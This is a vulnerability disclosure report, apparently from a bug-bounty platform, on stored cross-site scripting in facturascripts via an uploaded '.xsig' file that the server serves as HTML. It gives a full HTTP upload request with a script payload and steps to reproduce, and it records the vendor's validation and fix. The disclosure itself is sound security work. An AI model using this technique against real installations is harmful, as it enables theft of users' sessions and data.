Cross-site scripting - Stored via upload `.xsig` file in neorazorx/facturascripts

Valid

Reported on

May 4th 2022

Description

When user upload a file with .xsig extension and direct access this file, the server response with Content-type: text/html lead to processing XSIG as HTML file.

Proof of Concept

POST /facturascripts/EditAttachedFile?code=1&action=save-ok HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------116175579928758251263819370629
Content-Length: 1356
Origin: http://localhost
Connection: close
Referer: http://localhost/facturascripts/EditAttachedFile?code=1&action=save-ok
Cookie: <web-cookies>
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="action"

insert
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="activetab"

EditAttachedFile
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="code"


-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="multireqtoken"

99a8c7a2305b11e06fbd8bc0c9446f0826e73bdd|4vnVMk
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="path"; filename="xss.xsig"
Content-Type: text/html

<script>alert(window.origin)</script>
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="filename"


-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="mimetype"


-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="size"

0
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="date"

2022-04-30
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="hour"

17:45:45
-----------------------------116175579928758251263819370629--

Step to reproduce

Prepare a file xss.xsig with content: <script>alert(window.origin)</script>
Upload xss.xsig file in Admin -> Library
Click Download and XSS

Poc Image

Impact

This vulnerability can be arbitrarily executed javascript code to steal user'cookie, perform HTTP request, get content of same origin page, etc ...

References

https://owasp.org/www-project-top-ten/2017/A7_2017-Cross-Site_Scripting_(XSS)

We are processing your report and will contact the neorazorx/facturascripts team within 24 hours. a year ago

Carlos Garcia validated this vulnerability a year ago

Nhien.IT has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

We have sent a fix follow up to the neorazorx/facturascripts team. We will try again in 7 days. a year ago

Carlos Garcia marked this as fixed in 2022.07 with commit fd6f2d a year ago

Carlos Garcia has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation